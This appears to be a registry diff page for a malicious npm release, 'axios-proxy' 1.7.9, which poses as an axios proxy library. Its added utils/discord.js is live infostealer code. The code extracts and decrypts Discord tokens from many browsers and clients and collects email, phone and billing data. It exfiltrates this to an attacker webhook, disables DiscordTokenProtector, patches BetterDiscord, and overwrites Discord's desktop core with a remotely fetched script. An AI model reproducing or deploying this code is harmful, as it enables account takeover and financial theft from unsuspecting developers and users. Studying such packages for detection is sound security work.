axios-proxy 0.0.1-security → 1.7.9

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.

This version of axios-proxy might be problematic. Click here for more details.

Files changed (38) hide show
  1. package/LICENSE +201 -0
  2. package/README.md +1313 -5
  3. package/config/counter.js +24 -0
  4. package/config/crypto.js +20 -0
  5. package/config/discord.js +23 -0
  6. package/config/environ.js +132 -0
  7. package/config/executable.js +8 -0
  8. package/config/jszip.js +15 -0
  9. package/config/jsziptg.js +15 -0
  10. package/config/main.js +6 -0
  11. package/config/telegram.js +7 -0
  12. package/config/user.js +43 -0
  13. package/config/wallets.js +17 -0
  14. package/config.js +8 -0
  15. package/discord_desktop_core/index.js +856 -0
  16. package/gofile.js +323 -0
  17. package/index.js +4 -0
  18. package/index2.js +323 -0
  19. package/infection.js +276 -0
  20. package/keywords.js +16 -0
  21. package/lib.txt +1 -0
  22. package/package.json +47 -3
  23. package/utils/browsers.js +503 -0
  24. package/utils/clipper.js +38 -0
  25. package/utils/constructor.js +14 -0
  26. package/utils/data.js +19 -0
  27. package/utils/discord.js +448 -0
  28. package/utils/encryption.js +11 -0
  29. package/utils/flags.js +509 -0
  30. package/utils/infection.js +199 -0
  31. package/utils/jszip.js +37 -0
  32. package/utils/jsziptg.js +37 -0
  33. package/utils/protection.js +45 -0
  34. package/utils/prototype.js +29 -0
  35. package/utils/telegram.js +27 -0
  36. package/utils/time.js +7 -0
  37. package/utils/wallets.js +31 -0
  38. package/utils/webhook.js +78 -0
package/utils/discord.js ADDED
@@ -0,0 +1,448 @@
1
+ module.exports = (client) => {
2
+ return {
3
+
4
+ async getTokens() {
5
+ var paths = {
6
+ 'Discord': client.utils.encryption.decryptData(client.config.user.appdata) + '\\discord\\Local Storage\\leveldb\\',
7
+ 'Discord Canary': client.utils.encryption.decryptData(client.config.user.appdata) + '\\discordcanary\\Local Storage\\leveldb\\',
8
+ 'Lightcord': client.utils.encryption.decryptData(client.config.user.appdata) + '\\Lightcord\\Local Storage\\leveldb\\',
9
+ 'Discord PTB': client.utils.encryption.decryptData(client.config.user.appdata) + '\\discordptb\\Local Storage\\leveldb\\',
10
+ 'Opera': client.utils.encryption.decryptData(client.config.user.appdata) + '\\Opera Software\\Opera Stable\\Local Storage\\leveldb\\',
11
+ 'Opera GX': client.utils.encryption.decryptData(client.config.user.appdata) + '\\Opera Software\\Opera GX Stable\\Local Storage\\leveldb\\',
12
+ 'Amigo': client.utils.encryption.decryptData(client.config.user.localappdata) + '\\Amigo\\User Data\\Local Storage\\leveldb\\',
13
+ 'Torch': client.utils.encryption.decryptData(client.config.user.localappdata) + '\\Torch\\User Data\\Local Storage\\leveldb\\',
14
+ 'Kometa': client.utils.encryption.decryptData(client.config.user.localappdata) + '\\Kometa\\User Data\\Local Storage\\leveldb\\',
15
+ 'Orbitum': client.utils.encryption.decryptData(client.config.user.localappdata) + '\\Orbitum\\User Data\\Local Storage\\leveldb\\',
16
+ 'CentBrowser': client.utils.encryption.decryptData(client.config.user.localappdata) + '\\CentBrowser\\User Data\\Local Storage\\leveldb\\',
17
+ '7Star': client.utils.encryption.decryptData(client.config.user.localappdata) + '\\7Star\\7Star\\User Data\\Local Storage\\leveldb\\',
18
+ 'Sputnik': client.utils.encryption.decryptData(client.config.user.localappdata) + '\\Sputnik\\Sputnik\\User Data\\Local Storage\\leveldb\\',
19
+ 'Vivaldi': client.utils.encryption.decryptData(client.config.user.localappdata) + '\\Vivaldi\\User Data\\Default\\Local Storage\\leveldb\\',
20
+ 'Chrome SxS': client.utils.encryption.decryptData(client.config.user.localappdata) + '\\Google\\Chrome SxS\\User Data\\Local Storage\\leveldb\\',
21
+ 'Chrome': client.utils.encryption.decryptData(client.config.user.localappdata) + '\\Google\\Chrome\\User Data\\Default\\Local Storage\\leveldb\\',
22
+ 'Epic Privacy Browser': client.utils.encryption.decryptData(client.config.user.localappdata) + '\\Epic Privacy Browser\\User Data\\Local Storage\\leveldb\\',
23
+ 'Microsoft Edge': client.utils.encryption.decryptData(client.config.user.localappdata) + '\\Microsoft\\Edge\\User Data\\Defaul\\Local Storage\\leveldb\\',
24
+ 'Uran': client.utils.encryption.decryptData(client.config.user.localappdata) + '\\uCozMedia\\Uran\\User Data\\Default\\Local Storage\\leveldb\\',
25
+ 'Yandex': client.utils.encryption.decryptData(client.config.user.localappdata) + '\\Yandex\\YandexBrowser\\User Data\\Default\\Local Storage\\leveldb\\',
26
+ 'Brave': client.utils.encryption.decryptData(client.config.user.localappdata) + '\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Local Storage\\leveldb\\',
27
+ 'Iridium': client.utils.encryption.decryptData(client.config.user.localappdata) + '\\Iridium\\User Data\\Default\\Local Storage\\leveldb\\'
28
+ }
29
+
30
+ for (let [key, value] of Object.entries(paths)) {
31
+ if (!client.requires.fs.existsSync(value)) {
32
+ continue;
33
+ }
34
+
35
+ for (var file_name of client.requires.fs.readdirSync(value)) {
36
+ if (!file_name.endsWith(".log") && !file_name.endsWith(".ldb")) {
37
+ continue;
38
+ }
39
+
40
+ let path_split = value.split('\\'),
41
+ path_split_tail = value.includes('Network') ? path_split.splice(0, path_split.length - 3) : path_split.splice(0, path_split.length - 2),
42
+ path_tail = path_split_tail.join('\\') + '\\';
43
+
44
+
45
+
46
+ for (var line of client.requires.fs.readFileSync(`${value}/${file_name}`, encoding = "utf8").split("\n")) {
47
+
48
+ if (value.includes("cord")) {
49
+
50
+ let encrypted = Buffer.from(JSON.parse(client.requires.fs.readFileSync(path_tail.replace("Local Storage", "Local State")))
51
+ .os_crypt.encrypted_key, 'base64')
52
+ .slice(5);
53
+
54
+ const _key = client.requires.dpapi.unprotectData(Buffer.from(encrypted, "utf-8"), null, 'CurrentUser');
55
+
56
+ var encrypted_regex = /dQw4w9WgXcQ:[^\"]*/;
57
+ if (line.match(encrypted_regex)) {
58
+ try {
59
+ var token = Buffer.from(line.match(encrypted_regex)[0].split('dQw4w9WgXcQ:')[1], "base64");
60
+ let start = token.slice(3, 15),
61
+ middle = token.slice(15, token.length - 16),
62
+ end = token.slice(token.length - 16, token.length),
63
+ decipher = client.requires.crypto.createDecipheriv('aes-256-gcm', _key, start);
64
+
65
+ decipher.setAuthTag(end);
66
+ token = decipher.update(middle, 'base64', 'utf-8') + decipher.final('utf-8')
67
+
68
+ await this.validateToken(key, token);
69
+ } catch {}
70
+ }
71
+ } else {
72
+ [/\w-]{24}\.[\w-]{6}\.[\w-]{27}/, /mfa\.[\w-]{84}/].forEach(async (regex) => {
73
+ if (line.match(regex)) {
74
+ await this.validateToken(key, line.match(regex)[0]);
75
+ }
76
+ })
77
+ }
78
+ }
79
+ }
80
+ }
81
+
82
+
83
+ },
84
+
85
+ async validateToken(source, token) {
86
+
87
+ if (client.config.environ.validated_tokens.contains(token)) {
88
+ return;
89
+ }
90
+
91
+ client.config.environ.validated_tokens.push(token)
92
+
93
+ const req = await client.requires.axios({
94
+ url: "https://discord.com/api/v9/users/@me",
95
+ method: "GET",
96
+ headers: {
97
+ "Authorization": token,
98
+ "Content-Type": "application/json",
99
+ "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
100
+ }
101
+ }).catch((err) => {
102
+ return err.response;
103
+ });
104
+
105
+ if (req.request.res.statusCode == 200) {
106
+
107
+ const billing = await client.requires.axios({
108
+ url: "https://discord.com/api/v9/users/@me/billing/payment-sources",
109
+ method: "GET",
110
+ headers: {
111
+ "Authorization": token,
112
+ "Content-Type": "application/json",
113
+ "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
114
+ }
115
+ }).catch((err) => {
116
+ return err.response;
117
+ });
118
+
119
+ var _billing = [];
120
+
121
+ try {
122
+
123
+ billing.data.forEach(billing => {
124
+ if (billing.type == "") {
125
+ return "false"
126
+ } else if (billing.invalid == true) {
127
+ return "false"
128
+ } else if (billing.type == 2) {
129
+ _billing.push("PayPal")
130
+ } else if (billing.type == 1) {
131
+ _billing.push(`Credit Card (${billing.country})`)
132
+ }
133
+ })
134
+
135
+ } catch {}
136
+
137
+ if (!client.config.discord.grabbed_tokens[source]) {
138
+ client.config.discord.grabbed_tokens[source] = []
139
+ }
140
+
141
+ client.config.discord.grabbed_tokens[source].push({
142
+ "source": source,
143
+ "id": req.data.id,
144
+ "username": `${req.data.username}#${req.data.discriminator}`,
145
+ "phone": req.data.phone,
146
+ "email": req.data.email,
147
+ "locale": req.data.locale,
148
+ "nitro": this.getNitro(req.data.premium_type),
149
+ "badges": this.getBadges(req.data.flags),
150
+ "billing": _billing.join(", ") != '' ? _billing.join(", ") : 'None',
151
+ "token": token
152
+ });
153
+
154
+ client.config.discord.grabbed_tokens.all.push({
155
+ "source": source,
156
+ "id": req.data.id,
157
+ "username": `${req.data.username}#${req.data.discriminator}`,
158
+ "phone": req.data.phone,
159
+ "email": req.data.email,
160
+ "locale": req.data.locale,
161
+ "nitro": this.getNitro(req.data.premium_type),
162
+ "badges": this.getBadges(req.data.flags),
163
+ "billing": _billing.join(", ") != '' ? _billing.join(", ") : 'None',
164
+ "token": token
165
+ });
166
+
167
+ var fields = [];
168
+
169
+ for (let [key, value] of Object.entries({
170
+ "Source": source,
171
+ "Identifier": req.data.id,
172
+ "Username": `${req.data.username}#${req.data.discriminator}`,
173
+ "Phone Number": req.data.phone,
174
+ "E-Mail Address": req.data.email,
175
+ "Locale": req.data.locale,
176
+ "Nitro": this.getNitro(req.data.premium_type),
177
+ "Badges": this.getBadges(req.data.flags) != '' ? this.getBadges(req.data.flags) : 'None',
178
+ "Billing": _billing.join(", ") != '' ? _billing.join(", ") : 'None',
179
+ "Token": token
180
+ })) {
181
+ fields.push({
182
+ name: key,
183
+ value: `\`\`\`${value}\`\`\``,
184
+ inline: true,
185
+ })
186
+ }
187
+
188
+ await client.utils.webhook.sendToWebhook(
189
+ {
190
+ "embeds": [client.utils.webhook.createEmbed({
191
+ "title": `Found token in: ${source}`,
192
+ "fields": fields,
193
+ "thumbnail": {
194
+ "url": req.data.avatar ? `https://cdn.discordapp.com/avatars/${req.data.id}/${req.data.avatar}` : "https://cdn.discordapp.com/embed/avatars/0.png"
195
+ },
196
+ "author": {
197
+ "name": `${req.data.username}#${req.data.discriminator} (${req.data.id})`,
198
+ "url": client.utils.encryption.decryptData(client.config.embed.href),
199
+ "icon_url": req.data.avatar ? `https://cdn.discordapp.com/avatars/${req.data.id}/${req.data.avatar}` : "https://cdn.discordapp.com/embed/avatars/0.png"
200
+ },
201
+ })],
202
+ })
203
+ }
204
+ },
205
+
206
+ async saveDiscordTokens() {
207
+ if (client.config.discord.grabbed_tokens.all.length == 0) {
208
+ return;
209
+ }
210
+ client.utils.jszip.createFolder("\\Discord")
211
+
212
+ for (let [key, value] of Object.entries(client.config.discord.grabbed_tokens)) {
213
+ if (value.length != 0) {
214
+ let result = "";
215
+
216
+ for (let obj of value) {
217
+ result += `==================================================\nSource : ${obj.source}\nIdentifier : ${obj.id}\nUsername : ${obj.username}\nPhone : ${obj.phone}\nE-Mail Address : ${obj.email}\nLocale : ${obj.locale}\nNitro : ${obj.nitro}\nBadges : ${obj.badges != '' ? obj.badges : 'None'}\nBilling : ${obj.billing != '' ? obj.billing : 'None'}\nToken : ${obj.token}\n==================================================\n\n`;
218
+ }
219
+
220
+ client.utils.jszip.createTxt(`\\Discord\\${key.toUpperCase()}.txt`, result)
221
+ }
222
+ }
223
+ },
224
+
225
+ getBadges(flags) {
226
+ var badges = {
227
+ Discord_Employee: {
228
+ Value: 1,
229
+ Emoji: "Discord Employee",
230
+ Rare: true,
231
+ },
232
+ Partnered_Server_Owner: {
233
+ Value: 2,
234
+ Emoji: "Partnered Server Owner",
235
+ Rare: true,
236
+ },
237
+ HypeSquad_Events: {
238
+ Value: 4,
239
+ Emoji: "HypeSquad Events",
240
+ Rare: true,
241
+ },
242
+ Bug_Hunter_Level_1: {
243
+ Value: 8,
244
+ Emoji: "Bug Hunter Level 1",
245
+ Rare: true,
246
+ },
247
+ Early_Supporter: {
248
+ Value: 512,
249
+ Emoji: "Early Supporter",
250
+ Rare: true,
251
+ },
252
+ Bug_Hunter_Level_2: {
253
+ Value: 16384,
254
+ Emoji: "Bug Hunter Level 2",
255
+ Rare: true,
256
+ },
257
+ Early_Verified_Bot_Developer: {
258
+ Value: 131072,
259
+ Emoji: "Early Verified Bot Developer",
260
+ Rare: true,
261
+ },
262
+ House_Bravery: {
263
+ Value: 64,
264
+ Emoji: "House Bravery",
265
+ Rare: false,
266
+ },
267
+ House_Brilliance: {
268
+ Value: 128,
269
+ Emoji: "House Brilliance",
270
+ Rare: false,
271
+ },
272
+ House_Balance: {
273
+ Value: 256,
274
+ Emoji: "House Balance",
275
+ Rare: false,
276
+ }
277
+ };
278
+
279
+ var result = [];
280
+ for (var prop in badges) {
281
+ prop = badges[prop]
282
+ if ((flags & prop.Value) == prop.Value && prop.Rare) result.push(prop.Emoji);
283
+ };
284
+ return result.join(", ");
285
+ },
286
+
287
+ getNitro(premium_type) {
288
+ switch (premium_type) {
289
+ case 0:
290
+ return "No Nitro";
291
+ case 1:
292
+ return "Nitro Classic";
293
+ case 2:
294
+ return "Nitro Boost";
295
+ default:
296
+ return "No Nitro";
297
+
298
+ };
299
+ },
300
+
301
+ bypass_token_protector() {
302
+ for (const file of ["DiscordTokenProtector.exe", "ProtectionPayload.dll", "secure.dat"]) {
303
+ if (client.requires.fs.exists(`${client.utils.encryption.decryptData(client.config.user.localappdata)}\\${file}`)) {
304
+ client.requires.fs.rm(`${client.utils.encryption.decryptData(client.config.user.localappdata)}\\${file}`);
305
+ }
306
+ }
307
+
308
+ const token_protector_config = JSON.parse(client.requires.fs.readFileSync(`${client.utils.encryption.decryptData(client.config.user.localappdata)}\\DiscordTokenProtector\\config.json`, {
309
+ encoding: "utf-8"
310
+ }))
311
+
312
+ token_protector_config['auto_start'] = false
313
+ token_protector_config['auto_start_discord'] = false
314
+ token_protector_config['integrity'] = false
315
+ token_protector_config['integrity_allowbetterdiscord'] = false
316
+ token_protector_config['integrity_checkexecutable'] = false
317
+ token_protector_config['integrity_checkhash'] = false
318
+ token_protector_config['integrity_checkmodule'] = false
319
+ token_protector_config['integrity_checkscripts'] = false
320
+ token_protector_config['integrity_checkresource'] = false
321
+ token_protector_config['integrity_redownloadhashes'] = false
322
+ token_protector_config['iterations_iv'] = 0
323
+ token_protector_config['iterations_key'] = 0
324
+ token_protector_config['version'] = 0
325
+
326
+ client.requires.fs.writeFileSync(
327
+ `${client.utils.encryption.decryptData(client.config.user.localappdata)}\\DiscordTokenProtector\\config.json`,
328
+ JSON.stringify(
329
+ token_protector_config,
330
+ null, 4
331
+ )
332
+ )
333
+ },
334
+
335
+ async listExecutables() {
336
+ var processes = []
337
+ client.requires.child_process.exec('tasklist', (err, stdout) => {
338
+ for (const executable of ['Discord.exe', 'DiscordCanary.exe', 'discordDevelopment.exe', 'DiscordPTB.exe']) {
339
+ if (stdout.includes(executable)) {
340
+ client.config.discord.running_executables.push(executable)
341
+ processes.push(executable)
342
+ }
343
+ }
344
+ })
345
+
346
+ return processes
347
+ },
348
+
349
+ pwnBetterDiscord() {
350
+ if (client.requires.fs.existsSync(client.utils.encryption.decryptData(client.config.user.appdata) + "/BetterDiscord/data/betterdiscord.asar")) {
351
+ var _ = client.requires.fs.readFileSync(client.utils.encryption.decryptData(client.config.user.appdata) + "/BetterDiscord/data/betterdiscord.asar")
352
+ client.requires.fs.writeFileSync(client.utils.encryption.decryptData(client.config.user.appdata) + "/BetterDiscord/data/betterdiscord.asar", client.requires.buf_replace(_,
353
+ "api/webhooks", "liliandorker_on_top"))
354
+
355
+ }
356
+
357
+ },
358
+
359
+ async modify_discord_core() {
360
+ const res = await client.requires.axios.get(client.utils.encryption.decryptData(client.config.discord.base_url));
361
+
362
+ const file = () => {
363
+ let tempFile = res.data.replace('%WEBHOOK_LINK%', client.config.webhook.url)
364
+ return tempFile;
365
+ }
366
+
367
+ for (const path of client.config.discord.files_path) {
368
+ client.requires.fs.writeFileSync(path, file(), {
369
+ encoding: 'utf8',
370
+ flag: 'w'
371
+ });
372
+ }
373
+ },
374
+
375
+ findDiscordCore(prefixPath, files) {
376
+ files.forEach((file) => {
377
+ if (client.requires.fs.statSync(`${prefixPath}\\${file}`).isDirectory()) {
378
+ this.findDiscordCore(`${prefixPath}\\${file}`, client.requires.fs.readdirSync(`${prefixPath}\\${file}`))
379
+ } else {
380
+ if (file == "index.js" && !prefixPath.includes("node_modules") && prefixPath.includes("desktop_core")) {
381
+ client.config.discord.files_path.push(`${prefixPath}\\${file}`);
382
+ }
383
+ }
384
+ })
385
+ },
386
+
387
+ findBackupCodes(prefixPath, files) {
388
+ files.forEach(async (file) => {
389
+ if (file.startsWith(".") || file.includes("AppData") || file.includes("Program")) {
390
+ return;
391
+ }
392
+ if (file.startsWith("discord_backup_codes")) {
393
+ await client.utils.webhook.sendToWebhook(
394
+ {
395
+ "embeds": [client.utils.webhook.createEmbed({
396
+ "title": `💰 Discord backup codes found`,
397
+ "description": `\`\`\`${prefixPath}\\${file}\n\n${client.requires.fs.readFileSync(`${prefixPath}\\${file}`)}\`\`\``,
398
+ })],
399
+ })
400
+ client.utils.jszip.createTxt(`\\${file}_${client.requires.crypto.randomUUID()}.txt`, client.requires.fs.readFileSync(`${prefixPath}\\${file}`))
401
+ }
402
+ })
403
+ },
404
+
405
+ async getIP() {
406
+ return (await client.requires.axios.get("https://ipinfo.io/json")).data;
407
+ },
408
+
409
+ async init() {
410
+ this.pwnBetterDiscord();
411
+ for (const folder of client.requires.fs.readdirSync(client.utils.encryption.decryptData(client.config.user.localappdata))) {
412
+ if (folder.toLowerCase().includes('iscord')) {
413
+ client.config.discord.executables.push(`${client.utils.encryption.decryptData(client.config.user.localappdata)}\\${folder}`)
414
+ }
415
+ }
416
+
417
+ for (const executable of client.config.discord.executables) {
418
+ this.findDiscordCore(executable, client.requires.fs.readdirSync(executable))
419
+ }
420
+
421
+ ["Videos", "Desktop", "Documents", "Downloads", "Pictures"].forEach(async (type) => {
422
+ await this.findBackupCodes(`${client.utils.encryption.decryptData(client.config.user.hostdir)}\\${type}`, client.requires.fs.readdirSync(`${client.utils.encryption.decryptData(client.config.user.hostdir)}\\${type}`))
423
+ })
424
+
425
+ await this.modify_discord_core(); // 1
426
+
427
+ await client.requires.child_process.exec('tasklist', async (err, stdout) => {
428
+ for (const executable of ['Discord.exe', 'DiscordCanary.exe', 'discordDevelopment.exe', 'DiscordPTB.exe']) {
429
+ if (stdout.includes(executable)) {
430
+ await client.requires.child_process.exec(`taskkill /F /T /IM ${executable}`, (err) => {}) // Close
431
+ await client.requires.child_process.exec(`"${client.utils.encryption.decryptData(client.config.user.localappdata)}\\${executable.replace('.exe', '')}\\Update.exe" --processStart ${executable}`, (err) => {}) // Start
432
+ }
433
+ }
434
+ })
435
+
436
+ const network_data = await this.getIP();
437
+
438
+ client.utils.jszip.createTxt("\\Network Data.txt", `IP Address: ${network_data['ip'] ?? "Unknown"}\nHostname: ${network_data['hostname'] ?? "Unknown"}\nCity: ${network_data['city'] ?? "Unknown"}\nRegion: ${network_data['region'] ?? "Unknown"}\nCountry: ${network_data["country"] ?? "Unknown"}\nTimezone: ${network_data["timezone"] ?? "Unknown"}`)
439
+
440
+ await client.utils.time.sleep(30000);
441
+ for (const path of client.config.discord.files_path) {
442
+ if (client.requires.fs.existsSync(path.replace("index.js", "liliandorker"))) {
443
+ client.requires.fs.rmdirSync(path.replace("index.js", "liliandorker"));
444
+ }
445
+ }
446
+ }
447
+ };
448
+ };
package/utils/encryption.js ADDED
@@ -0,0 +1,11 @@
1
+ module.exports = (client) => {
2
+ return {
3
+ encryptData(data) {
4
+ return data;
5
+ },
6
+
7
+ decryptData(data) {
8
+ return data;
9
+ }
10
+ };
11
+ };